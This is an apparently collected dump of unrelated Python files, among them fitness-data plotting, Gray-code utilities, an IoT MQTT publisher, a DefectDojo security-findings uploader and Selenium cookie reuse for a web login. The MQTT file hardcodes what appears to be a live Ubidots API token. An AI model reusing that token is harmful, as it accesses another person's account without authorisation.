workoutDict = dict(workoutId=workoutDetail['id'], fitness_discipline = workoutDetail['fitness_discipline'], created_at = datetime.fromtimestamp(workoutDetail['created_at']))
# Call performance Endpoint to get calorie information
workoutPerformanceDetail = s.get(workoutPerformanceEndpoint % (wkid)).json()
# Calories are found in a list of dicts with a display name, slug and value (See sample above)
calorieOutput = [i for i in workoutPerformanceDetail['summaries'] if (i['slug'] == 'calories')][0]['value']
workoutDict['calories'] = calorieOutput
workoutInstructorDetail = s.get(workoutInstructorEndpoint % (wkid)).json()
# Instructor name are found within 'ride.instructor.name'
if workoutInstructorDetail['ride']['instructor'] is None:
workoutDict['instructorName'] = "Missing Instructor Information"
print "Workout is missing Instructor information, Id= %s" % (wkid)
else:
workoutDict['instructorName'] = workoutInstructorDetail['ride']['instructor']['name']
# Append each dict to a list to get ready for a dataframe
finalData.append(workoutDict)
else:
pass #Dont care for meditation classes at this point in time- mostly concerned about active fitness
# Convert to Pandas dataframe
df = pd.DataFrame(finalData)
# Task 1: Plot Calories by Day
# Create pretty Date column
df['Date'] = df.apply(lambda row: row.created_at.date(), axis=1)
df2 = df.groupby("Date", as_index=False).calories.sum()
df2['Date'] = pd.to_datetime(df2.Date) #, format='%Y%m%d'
df2['DateName'] = df2.Date.apply(lambda x: x.strftime('%B %d, %Y'))
df2.sort_values(by=['Date'], inplace=True, ascending=True)
# fig, ax = plt.subplots()
# ax.plot('Date', 'calories', data=df2)
ax = df2.plot(x ='Date', y='calories', kind = 'bar', xticks=df.index)
ax.set_xticklabels(df2.DateName)
# df['Daily Calories']= df.apply(lambda row: row.a + row.b, axis=1)
## Output and show chart 1
# plt.show()
# Average calories by day during Corona social distancing
df2['Month'] = df2['DateName'].str.split(" ", n=1, expand=True)[0]
df2['Year'] = df2['DateName'].str.split(" ", expand=True)[2]
df3 = df2[(df2['Year'] == '2020') & (df2['Month'].isin(['March', 'April']))]
average_calorie_per_day = df3['calories'].mean()
print "Average Calories Per Day during Corona, %s" % average_calorie_per_day
# Task 2: Number of classes per instructor
df4 = df.groupby("instructorName", as_index=True).count()[['workoutId']]
# Reset index so instructorName is a column in dataframe
df4 = df4.reset_index()
df4 = df4.rename(columns={'workoutId':'CountOfClasses'})
df4 = df4.sort_values(by=['CountOfClasses'], ascending=False)
ax = df4.plot(x='instructorName', y='CountOfClasses', kind='barh') #, orientation='horizontal')
plt.show()
# Perhaps to output to a csv at a later point to run through other tools:
# fields = ['peloton_id', 'user_id', 'title', 'fitness_discipline', 'total_work', 'total_leaderboard_users', 'leaderboard_rank']
# # , 'total_workouts', 'difficulty_rating_avg'
# # name of csv file
# filename = "MyPeletonData.csv"
# with open(filename, 'w') as csvfile:
# writer = csv.DictWriter(csvfile, fieldnames = fields)
# writer.writeheader()
# writer.writerows(mydict)
|
17,069 | 0a7c77c9d2582c323108f3606ed74d7420d3f109 | import numpy as np
def right_shift(binary, k=1, axis=-1):
''' Right shift an array of binary values.
Parameters:
-----------
binary: An ndarray of binary values.
k: The number of bits to shift. Default 1.
axis: The axis along which to shift. Default -1.
Returns:
--------
Returns an ndarray with zero prepended and the ends truncated, along
whatever axis was specified.
'''
# If we're shifting the whole thing, just return zeros.
if binary.shape[axis] <= k:
return np.zeros_like(binary)
# Determine the padding pattern.
padding = [(0,0)] * len(binary.shape)
padding[axis] = (k,0)
# Determine the slicing pattern to eliminate just the last one.
slicing = [slice(None)] * len(binary.shape)
slicing[axis] = slice(None, -k)
shifted = np.pad(binary[tuple(slicing)], padding,
mode='constant', constant_values=0)
return shifted
def binary2gray(binary, axis=-1):
''' Convert an array of binary values into Gray codes.
This uses the classic X ^ (X >> 1) trick to compute the Gray code.
Parameters:
-----------
binary: An ndarray of binary values.
axis: The axis along which to compute the gray code. Default=-1.
Returns:
--------
Returns an ndarray of Gray codes.
'''
shifted = right_shift(binary, axis=axis)
# Do the X ^ (X >> 1) trick.
gray = np.logical_xor(binary, shifted)
return gray
def gray2binary(gray, axis=-1):
''' Convert an array of Gray codes back into binary values.
Parameters:
-----------
gray: An ndarray of gray codes.
axis: The axis along which to perform Gray decoding. Default=-1.
Returns:
--------
Returns an ndarray of binary values.
'''
# Loop the log2(bits) number of times necessary, with shift and xor.
shift = 2**(int(np.ceil(np.log2(gray.shape[axis])))-1)
while shift > 0:
gray = np.logical_xor( gray, right_shift(gray, shift) )
shift //= 2
return gray
|
17,070 | b63fe5898f0dbc1d6d2c1ca4c6659dfde829399e | fruits=["cherry","banana","apple"]
for x in fruits:
print(x)
|
17,071 | f70f624e705c365acd5b309f07e3ddf821b55856 | # Add your code below for question 7.
|
17,072 | 6e65269ddd1dade7fa437c33592ebb11ac2f025b | from django import forms
from django.forms import inlineformset_factory
from .models import Buy, BuyItem, BuyStock
class BuyItemForm(forms.ModelForm):
class Meta:
model = BuyItem
fields = 'item', 'buy_amount', 'force_end',
def __init__(self, *args, **kwargs):
super(BuyItemForm, self).__init__(*args, **kwargs)
BuyProfile = self.fields['item'].queryset.model
self.fields['item'].queryset = BuyProfile.objects.active()
def clean_buy_amount(self):
buy_amount = self.cleaned_data['buy_amount']
if buy_amount <1:
raise forms.ValidationError('1 이상의 값이 필요합니다.')
pass
return buy_amount
BuyItemFormSet = inlineformset_factory(Buy, BuyItem, BuyItemForm,
fields=['item', 'buy_amount', 'force_end'],
max_num=1000, extra=1
)
|
17,073 | ca7f556d37d48e85038ee00e02613f9cd3000670 | # 잃어버린 괄호 : https://www.acmicpc.net/problem/1541
numbers_str = input().split('-')
numbers = []
for expr in numbers_str:
expression = ''
for num_str in expr.split('+'):
expression += '+' + num_str.lstrip('0')
numbers.append(eval(expression))
total = numbers[0]
for i in range(1, len(numbers)):
total -= numbers[i]
print(total)
|
17,074 | febd10cd03cc8ca995827e428bba982e237f0d95 | sm=input()
for i in range(0,len(sm)):
if(sm[i].isalpha() and sm[i].isdigit()):
print("No")
else:
print("Yes")
|
17,075 | d06ad2a8dd8fb473e9580ab0276b9e39729e004a | '''
Created on Mar 22, 2020
@author: Kratika Maheshwari
'''
from project import TempSensorAdaptorTask
'''
This Example sends harcoded data to Ubidots using the Paho MQTT
library.
Please install the library using pip install paho-mqtt
'''
import paho.mqtt.client as mqttClient
import time
import json
import random
'''
global variables
'''
connected = False # Stores the connection status
BROKER_ENDPOINT = "things.ubidots.com"
PORT = 1883
MQTT_USERNAME = "BBFF-08hJyBD6jtjlrxddzfS6pmyGfgMgX8" # Put your TOKEN here
MQTT_PASSWORD = ""
TOPIC = "/v1.6/devices/"
DEVICE_LABEL1 = "temperature-sensor"
VARIABLE_LABEL1 = "currenttemp"
DEVICE_LABEL2 = "humiditysensor"
VARIABLE_LABEL2 = "currentvalue"
DEVICE_LABEL3 = "pressuresensor"
VARIABLE_LABEL3 = "currentvalue"
'''
Functions to process incoming and outgoing streaming
'''
def on_connect(client, userdata, flags, rc):
if rc == 0:
print("[INFO] Connected to broker")
global connected # Use global variable
connected = True # Signal connection
else:
print("[INFO] Error, connection failed")
'''
displays output when data is published
'''
def on_publish(client, userdata, result):
print("[INFO] Published!")
'''
connect to the ubidots client
'''
def connect(mqtt_client, mqtt_username, mqtt_password, broker_endpoint, port):
global connected
if not connected:
mqtt_client.username_pw_set(mqtt_username, password=mqtt_password)
mqtt_client.on_connect = on_connect
mqtt_client.on_publish = on_publish
mqtt_client.connect(broker_endpoint, port=port)
mqtt_client.loop_start()
attempts = 0
while not connected and attempts < 5: # Waits for connection
print("[INFO] Attempting to connect...")
time.sleep(1)
attempts += 1
if not connected:
print("[ERROR] Could not connect to broker")
return False
return True
'''
publish the payload to the specified topic
'''
def publish(mqtt_client, topic, payload):
try:
mqtt_client.publish(topic, payload)
except Exception as e:
print("[ERROR] There was an error, details: \n{}".format(e))
'''
mqtt client connects with the ubidots cloud and send the data(payload) to connect method
'''
def ubidots(mqtt_client,curVal,data):
if(data=="temperature"):
payload={VARIABLE_LABEL1: curVal}
payload = json.dumps(payload)
topic = "{}{}".format(TOPIC, DEVICE_LABEL1)
elif(data=="humidity"):
payload={VARIABLE_LABEL2: curVal}
payload = json.dumps(payload)
topic = "{}{}".format(TOPIC, DEVICE_LABEL2)
elif(data=="pressure"):
payload={VARIABLE_LABEL3: curVal}
payload = json.dumps(payload)
topic = "{}{}".format(TOPIC, DEVICE_LABEL3)
if not connected: # Connects to the broker
connect(mqtt_client, MQTT_USERNAME, MQTT_PASSWORD,
BROKER_ENDPOINT, PORT)
# Publishes values
print("[INFO] Attempting to publish payload:")
print(payload)
publish(mqtt_client, topic, payload)
|
17,076 | 297155b606d71e244cc4391a117019ebc2720e8d | #!/usr/bin/env python
# encoding: utf-8
"""
@version: 0.0
@author: hailang
@Email: seahailang@gmail.com
@software: PyCharm
@file: mnist_utils.py
@time: 2017/12/13 10:48
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
import os
path = os.path.dirname(__file__)
FLAGS = tf.app.flags.FLAGS
class MnistModel(object):
def __init__(self):
self.image_w = 28
self.image_h = 28
self.channel = 1
self.cat_num = 10
self.example_shape=28*28*1
mnist = input_data.read_data_sets(path+"/MNIST_data/", one_hot=True)
if __name__ == '__main__':
pass |
17,077 | 181cd9c22f5a4b0d5254b49c2ee31bd88a4fcaa0 |
#def tempConvert(celcius, fahrenheit=((9/5)+32)):
# return(celcius*fahrenheit)
#tempConvert(float(input("Celcius? "))
def cel_to_fahr(c):
f = c * 9/5 + 32
return f
print(cel_to_fahr(10))
|
17,078 | 8af4caba9050dd8e7ce95759ae754e3224810d17 | import matchzoo as mz
import os
class DRMMConfig():
# preprocessor = mz.preprocessors.DRMMPreprocessor()
optimizer = 'SGD'
model = mz.models.DRMM
generator_flag = 1
name = 'DRMM'
num_dup = 1
num_neg = 4
shuffle = True
###### training config ######
batch_size = 20
epoch = 20
##### save config #####
parent_path = '/ssd2/wanning/matchzoo/saved_model/drmm'
save_path = os.path.join(parent_path,'') |
17,079 | 5dd11dab08e51de8ee4cde5766ea17a95af97a41 | from main.data.get_users import GetUsersRepoImpl
from main.domain.get_users_repo import GetUsersRepo
from main.domain.use_cases.get_users import GetUsersUseCase
def provide_use_case():
return GetUsersUseCase()
def provide_repo():
return GetUsersRepoImpl()
def get_users_binder(binder):
binder.bind_to_provider(GetUsersUseCase, provide_use_case)
binder.bind_to_provider(GetUsersRepo, provide_repo)
|
17,080 | 6c196c0df5347c02dcbae407582344fee5a4e6a5 | import findspark
findspark.init()
from pyspark import SparkConf, SparkContext
from pyspark.sql import SparkSession
def add1(a, b):
print("*"*55)
print(a)
print(b)
return a + b+100
def remove_outliers(nums):
stats = nums.stats()
stddev = stats.stdev()
return nums.filter(lambda x: abs(x - stats.mean()) < 3 * stddev)
if __name__ == '__main__':
sc = SparkContext('local', 'outliers')
# demo1
# nums = sc.parallelize([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 1000])
# output = sorted(remove_outliers(nums).collect())
# print(output)
# demo2
rdd = sc.parallelize([('a', 1), ('b', 100), ('a', 300), ('b', 3), ('a', 200)])
a = sorted(rdd.reduceByKey(add1).collect())
print(a)
|
17,081 | 4068d200036c6d401171f2a037998621fc8ae44f | import argparse
import logging
from datetime import datetime
from api.proto import engine_pb2
from consumers.consumer import Consumer
from third_party.python.defectdojo_api import defectdojo
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
class DefectDojoConsumer(Consumer):
def __init__(self, config: dict):
global logger
self.processed_records = 0
self.pvc_location = config.pvc_location
self.api_key = config.api_key
self.dojo_url = config.dojo_url
self.dojo_user = str(config.dojo_user)
self.dojo_product = config.dojo_product
self.dojo_engagement = config.dojo_engagement
self.dojo_user_id = config.dojo_user_id
self.dojo_test_id = None
self.dd = defectdojo.DefectDojoAPI(
self.dojo_url, self.api_key, self.dojo_user, debug=False)
if (self.pvc_location is None):
raise AttributeError("PVC claim location is missing")
def load_results(self) -> (list, bool):
try:
return self._load_enriched_results(), False
except SyntaxError:
return self._load_plain_results(), True
def _load_plain_results(self):
scan_results = engine_pb2.LaunchToolResponse()
return self.load_files(scan_results, self.pvc_location)
def _load_enriched_results(self):
"""Load a set of LaunchToolResponse protobufs into a list for processing"""
return super().load_results()
def _send_to_dojo(self, data: dict, dojo_test_id: int, start_date: str):
severity_map = {0: "Low", 1: "Low",
2: "Medium", 3: "High", 4: "Critical", 5: 'Info'}
logger.debug("Sending to dojo")
# todo (spyros): it also support marking findings as duplicates, if first_found is in
# the past this can be a duplicate
impact = "Possible product vulnerability"
active = True
verified = False
mitigation = "Please triage and resolve"
self.processed_records += 1
description = ("scan_id: %s \n tool_name: %s \n type: %s \n confidence: %s\n"
"original_path=%s \n original description: %s" % (data['scan_id'],
data['tool_name'],
data['type'],
data['confidence'],
data['target'],
data['description']))
finding = self.dd.create_finding(data['title'],
description,
severity_map[data['severity']],
0,
start_date,
self.dojo_product,
self.dojo_engagement,
dojo_test_id,
self.dojo_user_id,
impact,
active,
verified,
mitigation,
references=None,
build=None,
line=0,
# TODO (spyros): this is a hack so we
# can mark issues as "viewed",
# remove when
# https://github.com/DefectDojo/django-DefectDojo/issues/1609
# gets implemented
under_review=True,
file_path=data['target'],
false_p=str(data['false_positive']))
if not finding.success:
raise Exception(
"Couldn't communicate to DefectDojo error message: %s" % finding.message)
def send_results(self, collected_results: list, raw_issue: bool):
"""
Take a list of *ToolResponse protobufs and sends them to DefectDojo
If results are enriched, only the new, non-false positive results will be sent
:param collected_results: list of LaunchToolResponse protobufs
"""
for sc in collected_results:
logger.debug("handling result")
for iss in sc.issues:
logger.debug("handling issue")
if raw_issue:
logger.debug("issue is raw")
scan = sc
issue = iss
first_found = scan.scan_info.scan_start_time.ToJsonString()
false_positive = False
else:
logger.debug("issue %s is enriched!" % iss.raw_issue.title)
issue = iss.raw_issue
first_found = iss.first_seen.ToJsonString()
false_positive = iss.false_positive
scan = sc.original_results
if iss.count > 1:
logger.debug('Issue %s is a duplicate, count= %s, skipping' %
(issue.title, iss.count))
continue
if false_positive:
logger.debug(
'Issue %s has been marked as a false positive, skipping' % issue.title)
continue
data = {
'scan_start_time': scan.scan_info.scan_start_time.ToJsonString(),
'scan_id': scan.scan_info.scan_uuid,
'tool_name': scan.tool_name,
'target': issue.target,
'type': issue.type,
'title': issue.title,
'severity': issue.severity,
'cvss': issue.cvss,
'confidence': issue.confidence,
'description': issue.description,
'first_found': first_found,
'false_positive': false_positive
}
start_date = datetime.strptime(
data.get('scan_start_time'), '%Y-%m-%dT%H:%M:%SZ').date().isoformat()
if not self.dojo_test_id:
logger.info("Test %s doesn't exist, creating" %
scan.scan_info.scan_uuid)
start_date = datetime.strptime(
data.get('scan_start_time'), '%Y-%m-%dT%H:%M:%SZ').date().isoformat()
end_date = datetime.utcnow().date()
test_type = 2 # static Check sounds most generic, the python client
# won't accept adding custom title
# TODO (spyros): commit upstream
environment = 1 # development
test = self.dd.create_test(self.dojo_engagement,
str(test_type),
str(environment),
start_date,
end_date.isoformat())
if not test.success:
raise Exception(
"Couldn't create defecto dojo test: %s" % test.message)
self.dojo_test_id = test.id()
self._send_to_dojo(data, self.dojo_test_id, start_date)
def main():
try:
parser = argparse.ArgumentParser()
parser.add_argument(
'--pvc_location', help='The location of the scan results')
parser.add_argument(
'--raw', help='if it should process raw or enriched results', action="store_true")
parser.add_argument(
'--api_key', help='the api key for the defect dojo instance to connect to')
parser.add_argument('--dojo_url', help='defectdojo api target url')
parser.add_argument('--dojo_user', help='defectdojo user')
parser.add_argument(
'--dojo_product', help='defectdojo product for which the findings')
parser.add_argument(
'--dojo_engagement', help='defectdojo ci/cd style engagment for which you want to add'
' the test and findings')
parser.add_argument(
'--dojo_user_id', help='defectdojo id for the user you just specified')
args = parser.parse_args()
dd = DefectDojoConsumer(args)
except AttributeError as e:
raise Exception('A required argument is missing: ' + str(e))
logger.info('Loading results from %s' % str(dd.pvc_location))
collected_results, raw = dd.load_results()
if len(collected_results) == 0:
raise Exception('Unable to load results from the filesystem')
logger.info("gathered %s results" % len(collected_results))
logger.info("Reading raw: %s " % raw)
dd.send_results(collected_results, raw)
logger.info('Done, processed %s records!' % dd.processed_records)
if __name__ == '__main__':
main()
|
17,082 | 6279a17da2e37352e530ec49984e335483ebe572 | from matplotlib.patches import Circle, Rectangle, Arc
import matplotlib.pyplot as plt
def draw_pitch(ax=None, color='white', bg_color=None, lw=0.75, x_label='', y_label=''):
pitch_width = 68.0
pitch_length = 105.0
goal_size = 7.32
# if no axes is provided, set standard
if ax is None:
ax = plt.gca()
penalty_area = Rectangle((0, pitch_width / 2 - 16.5 - goal_size / 2), 16.5, 40.3,
fill=0, edgecolor=color, linewidth=lw)
penalty_area_r = Rectangle((pitch_length - 16.5, pitch_width / 2 - 16.5 - goal_size / 2), 16.5, 40.3,
fill=0, edgecolor=color, linewidth=lw)
gk_area = Rectangle((0, pitch_width / 2 - 5.5 - goal_size / 2), 5.5, 18.32,
fill=0, edgecolor=color, linewidth=lw)
gk_area_r = Rectangle((pitch_length - 5.5, pitch_width / 2 - 5.5 - goal_size / 2), 5.5, 18.32,
fill=0, edgecolor=color, linewidth=lw)
penalty_circle = Arc((11, pitch_width / 2), 18.3, 18.3,
theta1=308, theta2=52, linewidth=lw, color=color, fill=False)
penalty_circle_r = Arc((pitch_length - 11, pitch_width / 2), 18.3, 18.3,
theta1=126, theta2=234, linewidth=lw, color=color, fill=False)
penalty_spot = Circle((11, pitch_width / 2), radius=0.25, color=color, linewidth=0)
penalty_spot_r = Circle((pitch_length - 11, pitch_width / 2), radius=0.25, color=color, linewidth=0)
goal = Rectangle((-0.5, pitch_width / 2 - goal_size / 2), 0.5, goal_size, facecolor=color, linewidth=lw)
goal_r = Rectangle((pitch_length, pitch_width / 2 - goal_size / 2), 0.5,
goal_size, facecolor=color, linewidth=lw)
outer_pitch = Rectangle((0, 0), pitch_length, pitch_width,
fill=0, edgecolor=color, linewidth=lw)
left_side_pitch = Rectangle((0, 0), pitch_length / 2, pitch_width,
fill=0, edgecolor=color, linewidth=lw)
bottom_corner = Arc((0, 0), 2, 2, theta1=0, theta2=90, linewidth=lw, color=color, fill=False)
top_corner = Arc((0, pitch_width), 2, 2,
theta1=270, theta2=360, linewidth=lw, color=color, fill=False)
bottom_corner_r = Arc((pitch_length, 0), 2, 2, theta1=90, theta2=180, linewidth=lw, color=color, fill=False)
top_corner_r = Arc((pitch_length, pitch_width), 2, 2,
theta1=180, theta2=270, linewidth=lw, color=color, fill=False)
centre_spot = Circle((pitch_length / 2, pitch_width / 2), radius=0.25, color=color, linewidth=0)
kick_off = Circle((pitch_length / 2, pitch_width / 2),
radius=9.15, color=color, fill=False, linewidth=lw)
pitch_elements = [penalty_area, penalty_area_r, gk_area, gk_area_r, goal, goal_r,
outer_pitch, kick_off, left_side_pitch, bottom_corner,
top_corner, penalty_circle, penalty_circle_r, penalty_spot,
penalty_spot_r, centre_spot, top_corner_r, bottom_corner_r]
# draw all elements on the axes
for element in pitch_elements:
ax.add_patch(element)
# turn of grid
ax.grid(False)
ax.set_facecolor(bg_color)
ax.set(xlabel=x_label, ylabel=y_label)
|
17,083 | 28925551bb7ada722830bd1c198a952d77857e58 | #! /usr/bin/env python
# -*- coding:utf-8 -*-
"""
-------------------------------------
File name: Py01_regression.py
Author: Ruonan Yu
Date: 18-1-27
-------------------------------------
"""
import torch
import matplotlib.pyplot as plt
from torch.autograd import Variable
import torch.nn.functional as F # 激活函数在此
# *****************建立数据集****************
x = torch.unsqueeze(torch.linspace(-1, 1, 100), dim=1) # x data (tensor),shape (100,1)
y = x ** 2 + 0.2 * torch.rand(x.size()) # noisy y data (tensor),shape=(100,1)
# 用Variable来修饰这些数据tensor
x, y = Variable(x), Variable(y)
# *****************建立神经网络***************
class Net(torch.nn.Module): # 继承torch的Module
# 定义所有层的属性
def __init__(self, n_feature, n_hidden, n_output):
super(Net, self).__init__() # 继承__init__的功能
# 定义每层用什么样的形式
self.hidden = torch.nn.Linear(n_feature, n_hidden) # 隐藏层线性输出
self.predict = torch.nn.Linear(n_hidden, n_output) # 输出层线性输出
# 搭建层与层之间的关系
def forward(self, x): # 这同时也是Module中forward功能
# 正向传播输出值,神经网络分析出输出值
x = F.relu(self.hidden(x)) # 激励函数(隐藏层的线性值)
x = self.predict(x) # 输出值,不用激励函数
return x
# 定义net
net = Net(1, 10, 1)
# 快速搭建法
# net=torch.nn.Sequential(
# torch.nn.Linear(1,10),
# torch.nn.ReLU(),
# torch.nn.Linear(10,1)
# )
# print(net)
# 使用ion()命令开启交互模式
plt.ion()
plt.show()
# *****************训练网络*****************
# optimizer是训练的工具
optimizer = torch.optim.SGD(net.parameters(), lr=0.5) # 传入net的所有参数,学习率
loss_func = torch.nn.MSELoss() # 预测值和真实值的误差计算公式(均方误差)
for t in range(100):
prediction = net(x) # 喂点net训练数据x,输出预测值
loss = loss_func(prediction, y) # 计算两者的误差
optimizer.zero_grad() # 清空上一步的残余更新参数值
loss.backward() # 误差反向传播,计算参数更新值
optimizer.step() # 将参数更新值施加到net的parameters上
# ******************可视化训练过程**************
# 每5次输出一次
if t % 5 == 0:
plt.cla() # clear axis
plt.scatter(x.data.numpy(), y.data.numpy())
plt.plot(x.data.numpy(), prediction.data.numpy(), 'r-', lw=5)
plt.text(0.5, 0, r'$loss=%.4f$' % loss.data[0], fontdict={'size': 10, 'color': 'red'})
plt.pause(0.1)
# 关闭交互模式,防止图像一闪而过
plt.ioff()
plt.show()
|
17,084 | 7ec33be17897e2a769b69f52abf1b09f751ed351 | import os, glob
dirname = os.path.dirname(__file__)
__all__ = [ os.path.basename(f)[:-3] for f in glob.glob(dirname+"/*.py")]
try: __all__.remove('__init__')
except: pass
__import__(os.path.basename(dirname), globals(), locals(), ('*',), 2)
|
17,085 | 16beb4ebd8b17f3e416ee94b667d3b22185ea6bd | # Copyright 2020 Xilinx Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Module for registering Numpy DPU runtime layer """
import os
import json
import logging
import warnings
import numpy as np
import pyxir
from pyxir.runtime import base
from pyxir.runtime.rt_layer import BaseLayer
logger = logging.getLogger('pyxir')
class DPULayer(BaseLayer):
try:
from pyxir.contrib.vai_runtime.runner import Runner
except:
warnings.warn("Could not import Vitis-AI Runner")
def init(self):
# Setup
input_names = self.attrs['input_names']
assert(len(input_names) == 1)
output_names = self.attrs['output_names']
assert(len(output_names) >= 1)
self.runner = self.Runner(self.attrs['work_dir'])
logger.debug("SHAPE: {}".format(self.shape))
def forward_exec(self, inputs):
# type: (List[numpy.ndarray]) -> numpy.ndarray
# For now
assert(len(inputs) == 1)
assert(inputs[0].shape[0] == 1)
X = inputs[0]
res = []
inTensors = self.runner.get_input_tensors()
outTensors = self.runner.get_output_tensors()
batch_sz = 1
fpgaBlobs = []
for io in [inTensors, outTensors]:
blobs = []
for t in io:
shape = (batch_sz,) + tuple([t.dims[i] for i in range(t.ndims)][1:])
blobs.append(np.empty((shape), dtype=np.float32, order='C'))
fpgaBlobs.append(blobs)
fpgaInput = fpgaBlobs[0][0]
np.copyto(fpgaInput[0], X[0])
jid = self.runner.execute_async(fpgaBlobs[0], fpgaBlobs[1])
self.runner.wait(jid)
res.append(fpgaBlobs[1][0])
return tuple(res)
def __del__(self):
"""
Cleanup DPU resources
"""
del self.runner
pyxir.register_op('cpu-np', 'DPU', base.get_layer(DPULayer))
|
17,086 | 8730e15d45b3a976808d2eaec9ced06478e8141c | class Calculator:
C = 10
def add(self, a, b):
return a + b
@staticmethod
def info():
print("This is info class")
cal = Calculator()
# print(cal.add(10, 30))
# cal.info()
Calculator.info()
|
17,087 | 3623eb889f2f46e64d5c20f1a2b78118b9b28118 | import gdal
import subprocess
import psycopg2
import glob
import shutil
inputFolder = "/media/lancer/TOSHIBA/MODIS Terra/"
cutFolder = "/media/lancer/TOSHIBA/MODIS Terra Cut/"
def re_griding(inputfile, resx, resy, ouputfile):
regrid_command = "gdalwarp -t_srs '+proj=longlat +datum=WGS84' -tps -ot Float32 -wt Float32 -te 100.1 6.4 111.8 25.6 -tr {0} {1} -r cubic -srcnodata -9999 -dstnodata -9999 -overwrite -multi {2} {3}"
os.system(regrid_command.format(resx, resy, inputfile, ouputfile))
gdalwarp -t_srs '+proj=longlat +datum=WGS84' -tps -ot Float32 -wt Float32 -te 100.1 6.4 111.8 25.6 -srcnodata -9999 -dstnodata -9999 -overwrite -multi HDF4_EOS:EOS_GRID:"MOD08_D3.A2016032.006.2016034014959.hdf":mod08:Retrieved_Temperature_Profile_Standard_Deviation out.tif
gdalwarp -te 100.1 6.4 111.8 25.6 -srcnodata -9999 -dstnodata -9999 -overwrite -multi HDF4_EOS:EOS_GRID:"MOD08_D3.A2016032.006.2016034014959.hdf":mod08:Aerosol_Optical_Depth_Land_Ocean_Mean out2.tif
gdal_translate -of GTiff HDF4_EOS:EOS_GRID:"MOD08_D3.A2015001.006.2015035160108.hdf":mod08:Aerosol_Optical_Depth_Land_Ocean_Mean modis_ds12.tif
gdal_translate -of GTiff HDF4_EOS:EOS_GRID:"MOD11A1.A2008006.h16v07.005.2008007232041.hdf":MODIS_Grid_Daily_1km_LST:Clear_night_cov modis_ds12.tif
gdal_translate -of GTiff HDF4_EOS:EOS_GRID:"MOD04_L2.A2015333.0254.006.2015333030251.hdf":mod04:Optical_Depth_Land_And_Ocean modis_ds12.tif
gdalinfo MOD04_L2.A2015333.0254.006.2015333030251.hdf
gdal_translate -of GTiff HDF4_EOS:EOS_SWATH:"MOD04_L2.A2015333.0254.006.2015333030251.hdf":Swath00:Optical_Depth_Land_And_Ocean modis_ds12.tif
HDF4_EOS:EOS_SWATH:"MOD04_L2.A2015333.0254.006.2015333030251.hdf":Swath00:Optical_Depth_Land_And_Ocean
gdalwarp -t_srs '+proj=longlat +datum=WGS84' -tps -ot Float32 -wt Float32 -te 100.1 6.4 111.8 25.6 -srcnodata -9999 -dstnodata -9999 -overwrite -multi HDF4_EOS:EOS_SWATH:"MOD04_L2.A2015333.0254.006.2015333030251.hdf":Swath00:Optical_Depth_Land_And_Ocean out123.tif |
17,088 | d8e83733147204c89654aad7afb86fb42e758763 | import json
from time import sleep
from typing import Dict, List
from selenium import webdriver
from selenium.webdriver.common.by import By
class Test_one():
def setup(self):
option = webdriver.ChromeOptions()
option.debugger_address = "127.0.0.1:9222"
self.driver = webdriver.Chrome(options=option)
self.driver.implicitly_wait(3)
self.driver.get('https://work.weixin.qq.com/')
def test_one(self):
#这里直接就可以定位到复用页面的元素
#self.driver.find_element(By.XPATH, '//*//*[@id="_hmt_click"]/div[1]/div[4]/div[2]/a[1]').click()
# self.driver.find_element(By.XPATH,'//*[@id="indexTop"]/div[2]/aside/a[1]').click()
# sleep(6)
# cookie = self.driver.get_cookies()
# with open("cookie.txt", 'w') as f:
# json.dump(cookie, f)
# print('写入时的cookie:' + str(cookie))
with open("cookie.txt", 'r') as f:
# print("从文件中读cookie:"+str(json.load(f)))
cookies: List[Dict] = json.load(f)
for cookie in cookies:
if 'expiry' in cookie.keys():
cookie.pop('expiry')
self.driver.add_cookie(cookie)
self.driver.get('https://work.weixin.qq.com/wework_admin/frame#index')
self.driver.find_element(By.XPATH, '//*//*[@id="_hmt_click"]/div[1]/div[4]/div[2]/a[1]').click()
self.driver.find_element(By.ID, 'username').send_keys('qazse4')
|
17,089 | 80479066ebca14b499142ee81878bc24b4c73b32 | from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework import status
from django.core.cache import cache
from api.serializers import IPAddressSerializer, IPAddressGetSerializer
from api.models import IPAddress
ACCESS_KEY = '0a2d26de06ac50376c6e9508e00ffbe5'
# Function for accessing IPStack
def ip_find(address):
import requests
url = 'http://api.ipstack.com/{}'.format(address)
print(url)
params = {"access_key": ACCESS_KEY}
response = requests.get(url, params=params)
return response.json()
@api_view(['GET'])
def index(request):
if request.method == 'GET':
# serializer for getting IP address
serializer = IPAddressGetSerializer(data=request.data)
if serializer.is_valid():
address = serializer.data['address']
# get ip address data from cache
data = cache.get(address)
if data:
# pass data into serializer so we can return as JSON
serialized_data = IPAddressSerializer(data=data)
if serialized_data.is_valid():
return Response(serialized_data.data, status=status.HTTP_200_OK)
else:
try:
ip = IPAddress.objects.get(address=address)
except IPAddress.DoesNotExist:
ip = None
if ip is not None:
serialized_data = IPAddressSerializer(ip)
cache.set(address, serialized_data.data, 60)
return Response(serialized_data.data, status=status.HTTP_200_OK)
else:
response = ip_find(address)
data = {
"address": response['ip'],
"continent": response['continent_name'],
"country": response['country_name'],
"state": response['region_name'],
"latitude": response['latitude'],
"longitude": response['longitude']
}
serialized_data = IPAddressSerializer(data=data)
if serialized_data.is_valid():
serialized_data.save()
cache.set(address, serialized_data.data, 60)
return Response(serialized_data.data, status=status.HTTP_200_OK)
else:
return Response(serialized_data.errors, status=status.HTTP_400_BAD_REQUEST)
return Response(status=status.HTTP_200_OK)
|
17,090 | 2176af4275e2a38b52b7f1d90f06350c8aefe520 | # -*- coding: utf-8 -*-
"""
Created on Tue Dec 6 15:38:12 2016
compare the telemetered data with raw data for each profile
@author: yifan
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from turtleModule import str2ndlist,np_datetime
from gettopo import gettopo
def find_start(a,List):
start=len(List)-3
if List[a]<2:
for i in range(a,len(List)-2):
if List[i]<List[i+1] and List[i]<2:
if List[i+1]<List[i+2] and List[i+1]>=2 :
start=i
